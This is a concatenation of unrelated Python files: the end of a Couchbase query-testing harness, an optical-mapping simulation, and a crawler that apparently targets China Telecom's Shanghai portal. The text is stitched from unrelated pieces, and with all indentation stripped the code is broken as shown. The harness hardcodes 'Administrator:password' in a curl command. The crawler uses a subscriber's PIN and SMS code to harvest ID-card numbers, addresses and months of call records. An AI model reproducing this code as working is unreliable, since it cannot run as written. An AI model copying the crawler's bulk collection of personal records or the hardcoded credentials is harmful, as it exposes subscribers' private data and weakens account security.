os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
self.sleep(10)
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 15")
self._build_indexes()
def _build_indexes(self):
self.sec_index_map = {}
fields = ['primary_key_id','bool_field1','char_field1','datetime_field1','decimal_field1',
'int_field1','varchar_field1']
if self.create_secondary_indexes:
if self.use_mysql or self.use_postgres:
self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
else:
self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
if not self.generate_input_only:
if self.create_primary_index:
self._build_primary_indexes(self.using_gsi)
if self.create_secondary_meta_indexes:
index_name = ""
for table_name in self.sec_index_map.keys():
queries = {}
index_name = table_name
query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
"datetime_field1," \
"decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
queries[index_name] = query
if self.create_secondary_ansi_join_indexes:
for field in fields:
index_name = table_name+"_"+field
query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
queries[index_name] = query
for index_name in queries.keys():
try:
self.n1ql_helper.run_cbq_query(query=queries[index_name],
server=self.n1ql_server, verbose=False)
check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
index_name ,
server=self.n1ql_server,
timeout=240)
except Exception, ex:
self.log.info(ex)
if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
thread_list = []
if self.build_secondary_index_in_seq:
for table_name in self.sec_index_map.keys():
self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
else:
for table_name in self.sec_index_map.keys():
t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in data_set.keys():
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _initialize_rqg_query_helper(self):
return RQGQueryHelper()
def _initialize_n1ql_helper(self):
return N1QLHelper(version="sherlock", shell=None, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8903),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _initialize_postgres_client(self):
self.client = RQGPostgresClient()
self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in data.keys():
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in data[key].keys():
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([map(list, combinations(fields, i)) for i in range(len(fields) + 1)], [])
for x in xrange(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in xrange(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception, ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
raise
else:
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
def _generate_secondary_indexes_in_batches(self, batches):
if self.generate_input_only:
return
defer_mode = str({"defer_build": "true"})
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
batch_index_definitions = {}
build_index_list = []
# add indexes to batch_index_definitions
for info in batches:
table_name = info["bucket"]
batch_index_definitions.update(info["indexes"])
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
if self.aggregate_pushdown:
query = query.replace("limit 10 offset 4", "")
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
if index_name not in build_index_list:
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Monitor till the index is built
tasks = []
try:
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"]:
if index_name in build_index_list:
tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
for task in tasks:
task.result()
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
def async_monitor_index(self, bucket, index_name=None):
monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
n1ql_helper=self.n1ql_helper, index_name=index_name)
return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
def wait_for_index_drop(self, index_name_list):
self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"].keys():
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception, ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(info["indexes"].keys())
def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
def dump_failure_data(self, failure_record_queue):
if not self.record_failure:
return
import uuid
sub_dir = str(uuid.uuid4()).replace("-","")
self.data_dump_path = self.failure_record_path+"/"+sub_dir
os.mkdir(self.data_dump_path)
input_file_path = self.data_dump_path+"/input"
os.mkdir(input_file_path)
f_write_file = open(input_file_path+"/source_input_rqg_run.txt",'w')
secondary_index_path = self.data_dump_path+"/index"
os.mkdir(secondary_index_path)
database_dump = self.data_dump_path+"/db_dump"
os.mkdir(database_dump)
f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt",'w')
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
client.dump_database(data_dump_path=database_dump)
client._close_connection()
f_write_index_file.write(json.dumps(self.sec_index_map))
f_write_index_file.close()
while not failure_record_queue.empty():
f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
f_write_file.close()
def unzip_template(self, template_path):
if "zip" not in template_path:
return template_path
tokens = template_path.split("/")
file_name = tokens[len(tokens)-1]
output_path = template_path.replace(file_name, "")
with zipfile.ZipFile(template_path, "r") as z:
z.extractall(output_path)
template_path = template_path.replace(".zip", "")
return template_path
def _setup_and_load_buckets_from_files(self):
bucket_list = []
#Unzip the files and get bucket list
tokens = self.db_dump_path.split("/")
data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
os.mkdir(data_file_path)
with zipfile.ZipFile(self.db_dump_path, "r") as z:
z.extractall(data_file_path)
onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
for file in onlyfiles:
bucket_list.append(file.split(".")[0])
# Remove any previous buckets
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
# Create New Buckets
self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
# Wait till the buckets are up
self.sleep(15)
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
for bucket in self.buckets:
if bucket.name == bucket_name:
file_path = data_file_path+"/"+bucket_name+".txt"
with open(file_path) as data_file:
data = json.load(data_file)
self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
if self.populate_with_replay:
for key in data.keys():
insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
self.client._insert_execute_query(insert_sql)
shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=[]):
for bucket in bucket_list:
if bucket not in self.advise_dict.keys():
self.advise_dict[bucket] = self.advise_buckets[0]
self.advise_buckets.remove(self.advise_buckets[0])
def _setup_and_load_buckets(self):
# Remove any previous buckets
if self.skip_setup_cleanup:
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
if self.change_bucket_properties or self.gsi_type == "memory_optimized":
bucket_size = 100
else:
bucket_size = None
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 25")
# Pull information about tables from mysql database and interpret them as no-sql dbs
table_key_map = self.client._get_primary_key_map_for_tables()
# Make a list of buckets that we want to create for querying
bucket_list = table_key_map.keys()
self.log.info("database used is {0}".format(self.database))
new_bucket_list = []
for bucket in bucket_list:
if bucket.find("copy_simple_table") > 0:
new_bucket_list.append(self.database+"_"+"copy_simple_table")
else:
new_bucket_list.append(self.database + "_" + bucket)
if self.subquery:
break
# Create New Buckets
self.fill_advise_dict(new_bucket_list)
self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
self.log.info("buckets created")
# Wait till the buckets are up
self.sleep(5)
self.buckets = self.rest.get_buckets()
self.newbuckets = []
for bucket in self.buckets:
if bucket.name in new_bucket_list:
self.newbuckets.append(bucket)
self.log.info("safe to start another job")
self.record_db = {}
self.buckets = self.newbuckets
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
query = "select * from {0}".format(bucket_name)
columns, rows = self.client._execute_query(query=query)
self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
if self.subquery:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self.load_subquery_test_data(bucket)
else:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
if table_name != "simple_table":
client = self.client_map[table_name]
else:
client = self.client
query = "delete from {0} where primary_key_id is not null".format(table_name)
client._insert_execute_query(query=query)
query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
if self.use_advisor:
self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
try:
self.log.info("n1ql query is {0}".format(insert_sql))
self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
client._insert_execute_query(insert_sql)
except Exception, ex:
self.log.info(ex)
def load_subquery_test_data(self, bucket):
query = 'select primary_key_id from simple_table_1'
result = self.client._execute_sub_query(query)
primary_key_values = result
query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
'(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
self.client._db_execute_query(query)
for primary_key_value in primary_key_values:
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_field = result
query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
decimal_field_value = result
query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
int_field_value = result
query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
datetime_field_value = result
query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
bool_field_value = bool(result)
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_value = result
query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
char_value = result
orderid1 = "order-" + varchar_field
orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
price1 = self.query_helper._random_float()+10
price2 = self.query_helper._random_float()+100
qty1 = self.query_helper._random_int()
qty2 = self.query_helper._random_int()
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
self.client._insert_execute_query(query)
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
self.client._insert_execute_query(query)
n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
'("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
'"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
'"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
'"productId":"snack","price":%s,"primary_key_id":"%s"},' \
'{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
'"primary_key_id":"%s"}] } )'\
% (bucket.name,primary_key_value, primary_key_value, decimal_field_value,
int_field_value, datetime_field_value, bool_field_value, varchar_value,
char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
price2, primary_key_value)
self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
|
single_sim.py
|
from multiprocessing import Queue, Process
import time
from bnx import BNX
from false_sites import FalseSites
from molecule_generator import MoleculeGenerator, Molecule
from optical_variation import OpticalVariation
from optics import Optics
class SingleSim:
def __init__(self, args, bnx_path, genome, irate, erange, vmiss, stretch_factor, sizing, pulse_sigma):
self.args = args
self.bnx_path = bnx_path
self.genome = genome
self.iterations = args.iterations
self.m_generator = MoleculeGenerator(bnx_path, self.genome, 1)
self.irate = irate
self.erange = erange
self.vmiss = float("%.2f" % vmiss)
self.sf = stretch_factor
self.sizing = sizing
self.p_sigma = pulse_sigma
self.p_dist,self.p_sites = self.processFull()
"""
Simulation is performed self.iterations times, each by separate process.
"""
def processFull(self):
pt = None
ps = None
queue = Queue()
procs = [Process(target=self.processOne, args=(queue,)) for i in range(self.iterations)]
results = []
processed = 0
p_id = 0
num_pids = self.args.procs
pid_start = p_id
pid_end = p_id + num_pids
while processed < self.iterations:
for i in range(pid_start, pid_end):
procs[i].start()
for i in range(pid_start, pid_end):
results.append(queue.get())
for i in range(pid_start, pid_end):
procs[i].join()
processed += pid_end - pid_start
pid_start = pid_end
pid_end += num_pids
if pid_end > self.iterations:
pid_end = self.iterations
for value_pair in results:
ti = value_pair[0]
if pt == None:
pt = ti
else:
for i in range(self.args.dist_max_len):
pt[i] += ti[i]
for value_pair in results:
si = value_pair[1]
if ps == None:
ps = si
else:
for i in range(self.args.sites_max_len):
ps[i] += si[i]
m = []
for _, _, mols in results:
m += mols
if self.args.generate_bnx:
BNX.ToBNX(self.bnx_path.replace(".bnx","_generated.bnx"), m)
for i in range(self.args.dist_max_len):
pt[i] = pt[i] / self.iterations
for i in range(self.args.sites_max_len):
ps[i] = ps[i] / self.iterations
return (pt,ps)
def processOne(self, queue):
#bionano dataset specific setting
if "GM09888" in self.bnx_path or "GM11428" in self.bnx_path or "GM24143" in self.bnx_path:
molecules = self.m_generator.generate(self.erange, self.vmiss, "female")
else:
molecules = self.m_generator.generate(self.erange, self.vmiss, "male")
ins = FalseSites(self.irate, self.genome)
ins.processOne(molecules)
optics = Optics(molecules, 375, self.sizing, self.p_sigma)
optics.processOne()
sf = OpticalVariation(molecules, self.sf)
p_result = sf.processOne()
#bionano dataset specific setting
if "GM24149" in self.bnx_path or "GM24143" in self.bnx_path or "GM24385" in self.bnx_path:
queue.put((p_result, self.m_generator.sitesDist(molecules, False), molecules))
else:
queue.put((p_result, self.m_generator.sitesDist(molecules, True), molecules))
|
main.py
|
# -*- coding: utf-8 -*-
import re
import json
import urllib
import time
import traceback
import calendar
import sys
import datetime
import random
# 这段代码是用于解决中文报错的问题
reload(sys)
sys.setdefaultencoding("utf8")
from Queue import Queue
from threading import Thread
import threading
from datetime import date
from dateutil.relativedelta import relativedelta
if __name__ == '__main__':
sys.path.append('../..')
sys.path.append('../../..')
sys.path.append('../../../..')
from base_crawler import BaseCrawler
from crawler.china_telecom_tool import login_unity
else:
from worker.crawler.base_crawler import BaseCrawler
from worker.crawler.china_telecom_tool import login_unity
class Crawler(BaseCrawler):
"""
kwargs 包含
'tel': str,
'pin_pwd': str,
'id_card': str,
'full_name': unicode,
'sms_code': str,
'captcha_code': str
錯誤等級
0: 成功
1: 帳號密碼錯誤
2: 認證碼錯誤
9: 其他錯誤
"""
def __init__(self, **kwargs):
"""
初始化
"""
super(Crawler, self).__init__(**kwargs)
# 记录详单页面,分析字段不能对应问题
self.flag = False
def need_parameters(self, **kwargs):
return ['pin_pwd', 'sms_verify']
def get_verify_type(self, **kwargs):
return 'SMS'
def login(self, **kwargs):
ProvinceID = '02'
code, key = login_unity(self, ProvinceID, **kwargs)
if code != 0:
return code, key
cookie_url ="http://www.189.cn/login/skip/ecs.do?method=skip&platNo=93507&toStUrl=http://service.sh.189.cn/service/query/detail"
code, key, cookie_req = self.get(cookie_url)
return code, key
def send_verify_request(self, **kwargs):
"""
請求發送短信,或是下載圖片,或是同時發送請求
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
image_str: str, Captcha圖片的base64字串, SMS則回空
"""
# 设置cookie
get_detail_url = "http://service.sh.189.cn/service/mobileLogin"
code, key, resp = self.get(get_detail_url)
if code != 0:
return code, key, ''
send_verify_data = {}
send_verify_data['flag'] = 1
send_verify_data['devNo'] = kwargs['tel']
send_verify_data['dateType'] = ''
send_verify_data['startDate'] = ''
send_verify_data['endDate'] = ''
send_verify_data = urllib.urlencode(send_verify_data)
send_sms_url = "http://service.sh.189.cn/service/service/authority/query/billdetail/sendCode.do?" + send_verify_data
code, key, resp = self.get(send_sms_url)
if code != 0:
return code, key, ''
if 'service/error500' in resp.text:
self.log('crawler', 'send_sms_error', resp)
return 9, 'send_sms_error', ''
try:
send_sms_res = json.loads(resp.text)
send_sms_code = send_sms_res['CODE']
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error", ""
if send_sms_code == '0':
return 0, "success", ""
else:
self.log('crawler', 'request_error', resp)
return 9, "request_error", ""
def verify(self, **kwargs):
"""
執行二次驗證
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
"""
verify_data = {}
verify_data['input_code'] = kwargs['sms_code']
verify_data['selDevid'] = kwargs['tel']
verify_data['flag'] = 'nocw'
verify_data = urllib.urlencode(verify_data)
check_sms_url = "http://service.sh.189.cn/service/service/authority/query/billdetail/validate.do?" + verify_data
code, key, resp = self.get(check_sms_url)
if code != 0:
return code, key
try:
check_sms_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error"
if check_sms_res['CODE'] == "0":
return 0, "success"
elif check_sms_res['CODE'] == "ME10001":
self.log('network', "website_error", resp)
return 2, "verify_error"
else:
self.log('crawler', "crawl_error", resp)
return 9, "crawl_error"
def crawl_info(self, **kwargs):
"""
爬取帳戶資訊
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
info: dict, 帳戶信息,參考帳戶信息格式
"""
user_info_url = "http://service.sh.189.cn/service/my/basicinfo.do"
code, key, resp = self.post(user_info_url)
if code != 0:
return code, key, {}
try:
user_info_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error", {}
if user_info_res['CODE'] == "0":
try:
info_dict = self.user_info(user_info_res)
except:
error = traceback.format_exc()
self.log('crawler', "html_error : %s" % error, resp)
return 9, 'html_error', {}
return 0, "success", info_dict
# 官网不能查询个人信息,先返回空值。
user_info_data = {
'full_name': '',
'id_card': '',
'is_realname_register': False,
'open_date': '',
'address': ''
}
return 0, "success", user_info_data
# elif user_info_res['CODE'] == "ME10001":
# return "website_busy_error", 5, "website problem", {}
# else:
# return "param_error", 9, '返回参数未知:%s'%resp.text, {}
def user_info(self,response):
result = response['RESULT']
full_name = result['CustNAME']
id_card = result['MainIdenNumber']
address = result['PrAddrName']
open_date = ''
if id_card != "":
is_realname_register = True
else:
is_realname_register = False
return {
'full_name': full_name,
'id_card': id_card,
'is_realname_register': is_realname_register,
'open_date': open_date ,
'address' : address
}
def crawl_call_log(self, **kwargs):
"""
爬取詳單
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
call_log: list, 通信詳單,參考詳單格式
"""
tail_tel_num = ['2', '4', '6', '8']
if kwargs['tel'][-1] in tail_tel_num:
self.tel = kwargs['tel']
return self.new_crawl_call_log()
missing_list = []
pos_missing = []
crawl_num = 0
call_log = []
today = date.today()
search_month = [x for x in range(0,-6,-1)]
dates_retrys = [(x, self.max_retry) for x in search_month]
log_for_retrys = []
full_time = 50.0
time_fee = 0
rand_sleep = random.randint(30, 55) / 10.0
while dates_retrys:
each_month, retrys = dates_retrys.pop(0)
retrys -= 1
local_st = time.time()
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d"%(query_date.year, query_date.month)
begDate = "%d-%02d-01"%(query_date.year,query_date.month)
end_day = calendar.monthrange(query_date.year, query_date.month)[1]
endDate = "%d-%02d-%d"%(query_date.year,query_date.month,end_day)
log_for_retrys.append((search_month, retrys, time_fee))
crawl_call_data = {}
crawl_call_data['begin'] = 0
crawl_call_data['end'] = 9999
crawl_call_data['flag'] = 1
crawl_call_data['devNo'] = kwargs['tel']
crawl_call_data['dateType'] = 'now'
crawl_call_data['bill_type'] = 'SCP'
# 历史账单查询
# crawl_call_data['queryDate'] = monthDate
# 实时账单查询
crawl_call_data['startDate'] = begDate
crawl_call_data['endDate'] = endDate
crawl_call_data = urllib.urlencode(crawl_call_data)
# print crawl_call_data
call_log_url = "http://service.sh.189.cn/service/service/authority/query/billdetailQuery.do?" + crawl_call_data
code, key, resp = self.get(call_log_url)
if code != 0:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
else:
self.log("crawler", "重试失败{}".format(search_month), '')
missing_list.append(search_month)
continue
elif "ME10001" in resp.text:
missing_flag = False
#无通话记录, 这个月
self.log('crawler', '未查询到您的详单信息', resp)
pos_missing.append(search_month)
continue
try:
call_log_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
missing_list.append(search_month)
continue
if call_log_res['CODE'] == "0":
key, level, message, month_log = self.call_log_get(call_log_res, search_month)
if level != 0:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
